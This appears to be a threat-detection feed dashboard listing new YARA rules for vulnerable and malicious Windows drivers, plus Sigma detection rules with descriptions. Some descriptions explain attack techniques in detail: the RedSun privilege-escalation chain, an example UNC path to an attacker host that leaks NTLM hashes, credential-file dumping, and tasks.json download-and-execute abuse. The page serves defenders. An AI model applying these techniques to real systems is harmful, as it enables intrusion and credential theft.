currently serving 24038 YARA rules and 4578 Sigma rules
API Key
New Rules per Day
Newest YARA Rules
This table shows the newest additions to the YARA rule set
Rule
Description
Date
Ref
PUA_VULN_Driver_Cpuid_Cpuzsys_Cpuidservice_019C
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - cpuz.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Cpuid_Cpuzsys_Cpuidservice_0484
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - cpuz.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Cpuid_Cpuzsys_Cpuidservice_11A4
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - cpuz.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
MAL_Driver_Microsoftcorporation_Ntbiosys_Microsoftrwindowsrntoperatingsystem_96BF
Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - ntbios.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Cpuid_Cpuzsys_Cpuidservice_1E16
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - cpuz.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
MAL_Driver_Microsoftcorporation_Wantdsys_Microsoftwindowsoperatingsystem_06A0
Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - wantd.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Phoenixtechnologies_Agentsys_Driveragent_05F0
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - Agent64.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Cpuid_Cpuzsys_Cpuidservice_6C5C
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - cpuz.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
MAL_Driver_Microsoftcorporation_Windbgsys_Microsoftwindowsoperatingsystem_06C5
Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - windbg.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Powertool_Kevpsys_Powertool_09B0
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - kEvP64.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
MAL_Driver_Microsoftcorporation_Wintapixsys_Microsoftwindowsoperatingsystem_1485
Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - WinTapix.sys, SRVNET2.SYS. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Razerinc_Rzpnk_Rzpnk_0507
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - rzpnk.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Razerinc_Rzpnk_Rzpnk_0B54
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - rzpnk.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Razerinc_Rzpnk_Rzpnk_0C92
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - rzpnk.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Razerinc_Rzpnk_Rzpnk_2665
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - rzpnk.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Razerinc_Rzpnk_Rzpnk_8ED0
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - rzpnk.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Elaboratebytesag_Elbycdio_Cdrtools_7227
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - elbycdio.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Realtek_Rtkiosys_Realtekiodriver_3E1F
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - rtkio.sys, rtkio64.sys, rtkiow8x64.sys, rtkiow10x64.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Fintekcorp_Fintekcorpfintekpcieuart_1794
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - FPCIE2COM.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Geintelligentplatformsinc_Gedevicedriver_Proficymachineedition_Build_5114
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - GEDevDrv.SYS. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Rweverything_Rwdrvsys_Rwdrvdriver_1E0E
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - RwDrv.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Getactechnologycorporation_Mtcbsvsys_Getacsystemserviceprovider_4B46
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - GtcKmdfBs.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Rweverything_Rwdrvsys_Rweverythingreadwritedriver_0AAF
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - AsrRapidStartDrv.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Highresolutionenterpriseswwwhighrezcouk_Inpoutsys_Inpoutdriverversion_1636
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - inpout32.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Highresolutionenterpriseswwwhighrezcouk_Inpoutxsys_Inpoutxdriverversion_X_2D83
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - inpoutx64.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Inferre_Hwdetectngsys_Hwdetectngsys_2F8B
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - hwdetectng.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Sysinternalswwwsysinternalscom_Procexpsys_Processexplorer_3503
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - procexp.Sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Sysinternalswwwsysinternalscom_Procexpsys_Processexplorer_3C7E
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - procexp.Sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Insydesoftwarecorp_Segwindrvxsys_Segwindowsdriverx_0D30
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - segwindrvx64.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
PUA_VULN_Driver_Tenasyscorporation_Rtifsys_Intime_0D13
Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - rtif.sys. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
28.04.2026
Successful YARA Rules in Set
This table shows statistics of the best rules with lowest AV detection rates (rules created in the last 12 months, matches of the last 14 days)
Rule
Average AV Detection Rate
Sample Count
Info
VT
Latest YARA Matches with Low AV Detection Rate
This table lists the last matches with low AV detection rates (between 0 and 15 AV engines matched)
Rule
AVs
Hash
VT
SUSP_Encoded_WriteProcessMemory_FileOnly
3
c5c68556e7609f65f2d0f002561cec20884f740e7a80847d497226fe6e929984
SUSP_Encoded_Registry_Key_Paths_Sep22_1
3
c5c68556e7609f65f2d0f002561cec20884f740e7a80847d497226fe6e929984
SUSP_OBFUSC_PS1_Encoded_PowerShell_Commands_Apr22_1
3
c5c68556e7609f65f2d0f002561cec20884f740e7a80847d497226fe6e929984
SUSP_Encoded_DisableRealtimeMonitoring_Mar20
3
c5c68556e7609f65f2d0f002561cec20884f740e7a80847d497226fe6e929984
SUSP_Encoded_WriteProcessMemory_Ext1
3
c5c68556e7609f65f2d0f002561cec20884f740e7a80847d497226fe6e929984
SUSP_PS1_Loader_Indicator_Nov21_3
2
5e4e131c7096fcc49b912eea2db2a7cb2d0c6929960f9fb0a8183425906b6305
SUSP_OBFUSC_PowerShell_Indicator_Jun20_1
6
7f5fae6b593a565004e3ebe05449f7de18e68b2719fea3cc8e2783f53cb45912
SUSP_OBFUSC_PowerShell_Indicator_Jun20_1
2
5e4e131c7096fcc49b912eea2db2a7cb2d0c6929960f9fb0a8183425906b6305
SUSP_FromBase64_StartProcess_Combo_Mar21_1
6
7f5fae6b593a565004e3ebe05449f7de18e68b2719fea3cc8e2783f53cb45912
SUSP_PS1_Command_Rare_CmdLine_Arguments_Jan20
2
5e4e131c7096fcc49b912eea2db2a7cb2d0c6929960f9fb0a8183425906b6305
SUSP_OBFUSC_PowerShell_Indicator_Jun20_1
4
38e2a1685b3a564f8e5c4982ba9db341ae991fdcec2a7736b409cfc8179bdd08
YARA Rules Per Category
This list shows the number of YARA rules in the subscribable categories (categories overlap as a rule can be in 'n' categories)
Tag
Count
Malware
7591
Threat Hunting (not subscribable, only in THOR scanner)
5893
APT
5055
Hacktools
4858
Webshells
2402
Exploits
722
Newest Sigma Rules
This table shows the newest additions to the Sigma rule set
Rule
Description
Date
Ref
Info
Kubernetes Potential Enumeration Activity
Detects potential Kubernetes enumeration or attack activity via the audit log.
This includes the execution of common shells, utilities, or specialized tools like 'Rakkess' (access_matrix) and 'TruffleHog' via Kubernetes API requests.
Attackers use these methods to perform reconnaissance (enumeration), secret harvesting, or execute code (exec) within a cluster.
28.04.2026
Google Workspace Out Of Domain Email Forwarding
Detects automatic email forwarding to external domains in Google Workspace, which may indicate data leakage or misuse.
28.04.2026
Google Workspace Government Attack Warning
Detects a login attempt in Google Workspace flagged as a potential attack by a government-backed threat actor
28.04.2026
Suspicious Login Activity Classified By Google
Detects Google Workspace login activity that's classified as suspicious by Google.
28.04.2026
Cisco Dot1x Disabled
Detects the manual disablement of IEEE 802.1X (dot1x) on a Cisco network device interface.
Disabling dot1x bypasses Network Access Control (NAC) mechanisms, potentially allowing unauthorized devices to gain access to the internal network.
This activity is a common technique used by attackers or malicious insiders to establish persistence or perform lateral movement via rogue devices.
28.04.2026
Potential Exploitation of CVE-2025-5054 or CVE-2025-4598
Detects attempts of an attacker to enable core dumps for set-user-ID (SUID) processes by modifying the system file /proc/sys/fs/suid_dumpable, typically by setting its value to 1 or 2.
Enabling this feature allows memory dumps (core dumps) of SUID processes, which usually run with elevated privileges.
These dumps may contain sensitive information such as passwords, cryptographic keys or other secrets.
CVE-2025-5054: Information leak via core dumps from SUID binaries using apport.
CVE-2025-4598: Information disclosure in systemd-coredump due to insecure handling of SUID process memory dumps.
28.04.2026
Potential CVE-2026-33829 Exploitation - Windows Snipping Tool Remote File Path URI
Detects potential exploitation of CVE-2026-33829, a vulnerability in the Windows Snipping Tool URI handler (ms-screensketch:).
An attacker can abuse the 'filePath' parameter to supply a UNC path or HTTP URL, causing SnippingTool.exe to initiate a connection to a remote resource.
When a UNC path is used (e.g. \\attacker.com\share), this triggers an outbound NTLM authentication attempt, allowing the attacker to capture or relay the victim's Net-NTLMv2 hash.
HTTP-based paths may result in remote file loading or server-side request forgery (SSRF)-style access.
The URI can be delivered via a malicious hyperlink, phishing email, or web page.
28.04.2026
Sensitive File Dump Via Print.EXE
Detects the abuse of the Print.exe utility for credential harvesting which involves using Print.Exe to copy sensitive files such as ntds.dit, SAM, SECURITY, or SYSTEM from the Windows directory in order to extract credentials, locally or remotely.
28.04.2026
Suspicious Task Scheduler XML Pattern Related with AtExec
Detects creation of scheduled tasks with XML patterns commonly associated with Atexec,
a component of the NetExec tool that allows execution of commands via scheduled tasks for persistence and privilege escalation.
27.04.2026
Suspicious Certificate Request Pattern via CertReq
Detects suspicious certificate request patterns that may indicate abuse of certreq.exe for privilege escalation or lateral movement.
27.04.2026
Indirect Command Execution via SFTP ProxyCommand
Detects the use of SFTP.exe to execute commands indirectly via ProxyCommand parameter.
Threat actors were seen leveraging this legitimate Windows binary to bypass security controls and execute arbitrary commands while evading detection.
27.04.2026
PUA - Memory Dump Mount Via MemProcFS
Detects execution of MemProcFS a memory forensics tool with the '-device' parameter.
MemProcFS mounts physical memory as a virtual file system, allowing direct access to process memory and system structures.
Threat actors were seen abusing this utility to mount memory dumps and then extract sensitive information from processes like LSASS or extract registry hives to obtain credentials, LSA secrets, SAM data, and cached domain credentials.
MemProcFS usage that is not part of authorized forensic analysis should be treated as suspicious and warrants further investigation.
27.04.2026
Service Startup Type Change Via Wmic.EXE
Detects changes to service startup type to 'disabled' or 'manual' using the WMIC command-line utility.
27.04.2026
RedSun - TieringEngineService.exe Detected as EICAR Test File
Detects Windows Defender (EventID 1119 - Remediation Action Failed) flagging TieringEngineService.exe
dropped in a characteristic RS-{GUID} temporary directory, or the RedSun.exe process itself being present.
This covers the staging pattern used by RedSun, a Cloud Files API and opportunistic lock (oplock) based
AV bypass/privilege escalation tool.
RedSun works as follows:
1. Registers a Cloud Files sync root and creates a Cloud Files placeholder for TieringEngineService.exe under %TEMP%\RS-{GUID}\
2. The placeholder file carries EICAR test file content (Virus:DOS/EICAR_Test_File) to reliably trigger
a Defender scan and remediation attempt
3. Requests a batch oplock (FSCTL_REQUEST_BATCH_OPLOCK) on the placeholder file
4. When Defender attempts to scan/quarantine the file, the oplock triggers - holding the file open
5. During the oplock break window, RedSun swaps the mount point (junction) to redirect
\\?\C:\Windows\System32 to the attacker-controlled temp path
6. This races the AV/OS into executing the malicious TieringEngineService.exe with elevated privileges
17.04.2026
RedSun - Conhost.exe Spawned by TieringEngineService.exe
Detects two stages of the RedSun post-exploitation process chain that deliver a SYSTEM-level shell to the attacker's interactive session.
Observed process chain
services.exe
→ TieringEngineService.exe
→ conhost.exe (SYSTEM, CommandLine: bare path, no arguments)
→ cmd.exe / shell (SYSTEM, TerminalSessionId = attacker's session)
Stage 1 — TieringEngineService.exe spawns argument-less conhost.exe:
After winning the oplock + Cloud Files mount point race, the malicious TieringEngineService.exe (RedSun.exe copied to System32, started via CoCreateInstance
/ services.exe) detects it is NT AUTHORITY\SYSTEM and calls LaunchConsoleInSessionId().
This opens \\.\pipe\REDSUN, reads the attacker's session ID, duplicates the SYSTEM token, re-stamps it with that session ID via SetTokenInformation(TokenSessionId), then
calls CreateProcessAsUser to spawn conhost.exe with no arguments.
Stage 2 — Shell spawned from rogue conhost.exe (EDR sources with GrandParentImage):
The rogue SYSTEM conhost.exe spawns a shell (cmd.exe, PowerShell, etc.) as SYSTEM in the attacker's interactive session.
On EDR sources that expose GrandParentImage, the full three-level chain (TieringEngineService.exe → conhost.exe → shell) can be matched directly.
The legitimate TieringEngineService.exe is a headless COM server that is unlikely to spawn conhost.exe under normal conditions.
17.04.2026
RedSun - Named Pipe Created
Detects the creation of a named pipe with the hardcoded name "REDSUN".
The RedSun exploit tool uses a pipe with this name for synchronisation and command communication between its components during the Cloud Files API + oplock-based AV bypass and privilege escalation chain.
RedSun creates the pipe as \\??\pipe\REDSUN.
The pipe server listens for the token-duplicated elevated process to connect and respond, completing the privilege escalation from user to SYSTEM.
Presence of this pipe name indicates active or recent RedSun execution.
17.04.2026
RedSun - TieringEngineService.exe Staged in RS-Prefixed Temp Dir
Detects the creation of a file named TieringEngineService.exe inside a directory whose path contains the RS- prefix characteristic
of RedSun's staging directory (e.g. %TEMP%\RS-{GUID}\TieringEngineService.exe).
RedSun registers a Cloud Files sync root under this RS-prefixed path and drops a masqueraded placeholder there as part of its oplock-based AV bypass and privilege escalation chain.
The RS-{GUID} directory name is generated by RedSun itself and has no legitimate system usage,
making the combination of this path prefix and the TieringEngineService.exe filename a highly
specific indicator of RedSun activity.
17.04.2026
Potential C2 via Steam Community Page
Detects suspicious DNS queries to steamcommunity.com that may indicate using the Steam Community page to extract domain or IP address fronting for command-and-control (C2) communication.
This technique has been observed in various malware families, including CastleRAT, lummas, and others.
15.04.2026
Potential Rogue Virtual Machine Execution via VMX
Detects potential rogue virtual machine execution via direct vmx binary execution with -x argument, which bypasses vCenter visibility and registration workflows.
This technique may be used by adversaries to maintain persistence within a virtualized environment.
09.04.2026
Credential Dumping via Volatility Framework
Detects potential credential dumping activities using the Volatility memory forensics framework
09.04.2026
HackTool - NetExec File Indicators
Detects file creation events indicating NetExec (nxc.exe) execution on the local machine.
NetExec is a PyInstaller-bundled binary that extracts its embedded data files to a "_MEI<random>" directory
under the Temp folder upon execution. Files dropped under the "\nxc\" sub-directory of that
extraction path are unique to NetExec and serve as reliable on-disk indicators of execution.
NetExec (formerly CrackMapExec) is a widely used post-exploitation and lateral movement tool used for
Active Directory enumeration, credential harvesting, and remote code execution.
08.04.2026
Registry Query for Installed Software via Reg.Exe
Detects usage of reg.exe to enumerate installed software via registry queries.
Adversaries may use reg.exe to query registry keys that list installed software as part of their reconnaissance activities to identify potential targets or gather information about the software environment.
03.04.2026
Potential IIS Reconnaissance via AppCmd.Exe Utility
Detects potential reconnaissance activity targeting Internet Information Services (IIS) web servers through the use of the AppCmd.exe utility.
AppCmd.exe is a command-line tool used for managing IIS configurations and can be leveraged by attackers to gather information about the server environment, including sites, application pools, and modules.
03.04.2026
Suspicious CMD Echo of JavaScript Script Tag to File or Pipe
Detects usage of 'cmd /c echo <script...' with output redirected to a file or piped which may indicate suspicious JavaScript injection or script drop activity or one-liner script execution attempts.
Attackers may use this technique to create or execute JavaScript code on the target system, potentially for malicious purposes such as downloading and executing additional payloads, or for persistence.
Investigation of such events should consider the context of the command execution, including the content being echoed and the destination of the output.
03.04.2026
Potential User Profile Reconnaissance via CommandLine
Detects potential user profile reconnaissance activity by identifying command-line executions of 'cmd.exe' and 'reg.exe' that query user directories and registry keys associated with user profiles.
03.04.2026
Suspicious Download and Execution Pattern via VSCode/Cursor Tasks - Linux
Detects suspicious patterns where Visual Studio Code or Cursor spawns processes that both download and execute files, which may indicate abuse of the `tasks.json` configuration for malicious purposes.
This technique has been observed in campaigns such as "Contagious Interview," where adversaries leverage VSCode's workspace trust model to execute arbitrary code by embedding malicious commands in `tasks.json`.
Attackers may craft or alter `tasks.json` to automatically trigger downloads and execution of payloads when a user opens and trusts a workspace in VSCode or Cursor, enabling initial access or further compromise.
02.04.2026
DNS Exfiltration via DNSExfiltrator - Network
Detects DNS exfiltration activity using the DNSExfiltrator tool, which encodes data in DNS queries using certain encoding.
02.04.2026
Unusually Long DNS Query - Network
Detects unusually long DNS queries that may indicate DNS tunneling, data exfiltration attempts, or C2 communication.
Usage of DNS for C&C communication or data exfiltration often involves crafting long DNS queries to encode information.
02.04.2026
Suspicious Download and Execution Pattern via VSCode Tasks
Detects suspicious patterns where Visual Studio Code (VSCode) spawns processes that both download and execute files, which may indicate abuse of the `tasks.json` configuration for malicious purposes.
This technique has been observed in campaigns such as "Contagious Interview," where adversaries leverage VSCode's workspace trust model to execute arbitrary code by embedding malicious commands in `tasks.json`.
Attackers may craft or alter `tasks.json` to automatically trigger downloads and execution of payloads when a user opens and trusts a workspace in VSCode, enabling initial access or further compromise.
02.04.2026
YARA/SIGMA Rule Count
Rule Type
Community Feed
Nextron Private Feed
Yara
2815
21223
Sigma
3589
989
Sigma Rules Per Category (Community)
Type
Count
windows / process_creation
1350
windows / registry_set
219
windows / file_event
209
windows / ps_script
166
windows / security
160
linux / process_creation
139
windows / image_load
114
webserver
82
windows / system
74
macos / process_creation
69
aws / cloudtrail
55
proxy
54
windows / network_connection
53
linux / auditd
53
azure / activitylogs
42
windows / registry_event
40
azure / auditlogs
38
windows / ps_module
33
windows / application
31
windows / dns_query
27
windows / process_access
25
opencanary / application
24
azure / signinlogs
24
okta / okta
22
windows / pipe_created
19
azure / riskdetection
19
rpc_firewall / application
17
windows / windefend
17
gcp / gcp.audit
16
linux
16
github / audit
15
linux / file_event
15
bitbucket / audit
14
m365 / threat_management
13
cisco / aaa
13
windows / file_delete
13
windows / create_remote_thread
12
windows / codeintegrity-operational
10
dns
10
windows / driver_load
10
windows / registry_delete
10
kubernetes / application / audit
10
windows / ps_classic_start
9
windows / appxdeployment-server
9
windows / create_stream_hash
9
windows / firewall-as
8
windows / msexchange-management
8
gcp / google_workspace.admin
7
zeek / smb_files
7
antivirus
7
fortigate / event
7
azure / pim
7
windows / file_access
7
windows / bits-client
7
windows / dns-client
6
kubernetes / audit
6
zeek / dns
5
linux / network_connection
5
zeek / http
5
jvm / application
5
m365 / audit
4
macos / file_event
4
windows / sysmon
4
windows / taskscheduler
4
windows / iis-configuration
4
zeek / dce_rpc
4
windows / registry_add
3
gcp / google_workspace.login
3
linux / sshd
3
windows / wmi_event
3
windows / powershell-classic
3
windows / ntlm
3
linux / syslog
2
windows / security-mitigations
2
windows / dns-server
2
spring / application
2
apache
2
onelogin / onelogin.events
2
firewall
2
linux / vsftpd
1
windows / capi2
1
windows / shell-core
1
windows / file_change
1
windows / raw_access_thread
1
paloalto / file_event / globalprotect
1
zeek / x509
1
windows / certificateservicesclient-lifecycle-system
1
nodejs / application
1
paloalto / appliance / globalprotect
1
windows / microsoft-servicebus-client
1
python / application
1
windows / diagnosis-scripted
1
windows / file_executable_detected
1
m365 / exchange
1
zeek / rdp
1
windows / smbclient-security
1
windows / file_rename
1
windows / sysmon_status
1
ruby_on_rails / application
1
m365 / threat_detection
1
zeek / kerberos
1
windows / terminalservices-localsessionmanager
1
sql / application
1
windows / driver-framework
1
windows / sysmon_error
1
velocity / application
1
windows
1
cisco / duo
1
nginx
1
linux / sudo
1
cisco / bgp
1
windows / ldap
1
windows / wmi
1
windows / dns-server-analytic
1
database
1
cisco / ldp
1
windows / lsa-server
1
windows / ps_classic_provider_start
1
windows / printservice-operational
1
linux / clamav
1
django / application
1
windows / printservice-admin
1
windows / appmodel-runtime
1
linux / auth
1
linux / guacamole
1
huawei / bgp
1
windows / applocker
1
windows / openssh
1
fortios / sslvpnd
1
linux / cron
1
juniper / bgp
1
windows / appxpackaging-om
1
windows / process_tampering
1
cisco / syslog
1
windows / smbserver-connectivity
1
windows / smbclient-connectivity
1
Sigma Rules Per Category (Nextron Private Feed)
Type
Count
windows / process_creation
483
windows / registry_set
86
windows / ps_script
85
linux / process_creation
51
windows / file_event
47
windows / image_load
46
windows / wmi
29
windows / security
29
windows / system
13
proxy
12
windows / registry_event
8
windows / network_connection
8
windows / kernel-event-tracing
6
windows / dns_query
5
windows / ntfs
5
windows / ps_module
5
windows / create_remote_thread
4
windows / registry_delete
4
windows / sense
4
windows / taskscheduler
4
windows / pipe_created
4
webserver
3
windows / application-experience
3
windows / driver_load
3
windows / hyper-v-worker
3
windows / ps_classic_script
3
dns
3
windows / vhd
3
windows / windefend
2
windows / process_access
2
windows / process-creation
2
windows / file_access
2
windows / kernel-shimengine
2
windows / file_delete
2
windows / smbclient-security
2
linux / file_event
2
windows / bits-client
2
macos / process_creation
2
windows / codeintegrity-operational
2
windows / amsi
1
windows / application
1
windows / registry_add
1
windows / audit-cve
1
windows / firewall-as
1
windows / registry-setinformation
1
windows / file_rename
1
linux / file_delete
1
Tenable Nessus
Requirement: Privileged Scan
- YARA Scanning with Nessus works only when scanning with credentials (privileged scan)
YARA Scanning with Nessus
- You can only upload a single .yar file
- Filesystem scan has to be activated
- You have to define the target locations
- The Nessus plugin ID will be 91990
- Only files with the following extensions can be scanned: .application, .asp, .aspx, .bat, .chm, .class, .cmd, .com, .cp, .csh, .dl, .doc, .docx, .drv, .exe, .gadget, .hta, .inf, .ins, .inx, .isu, .jar, .job, .jpeg, .jpg, .js, .jse, .jse, .jsp, .lnk, .msc, .msi, .msp, .mst, .paf, .pdf, .php, .pif, .ppt, .pptx, .ps1, .ps1xm, .ps2, .ps2xm, .psc1, .psc2, .reg, .rgs, .scf, .scr, .sct, .shb, .shs, .swf, .sys, .u3p, .vb, .vbe, .vbs, .vbscript, .ws, .wsf, .xls, .xls
Carbon Black
Tutorial: https://github.com/carbonblack/cb-yara-connectorFireEye EX
Tutorial: https://www.fireeye.com/blog/products-and-services/2018/12/detect-and-block-email-threats-with-custom-yara-rules.html
Scan your endpoints, forensic images or collected files with our portable scanner THOR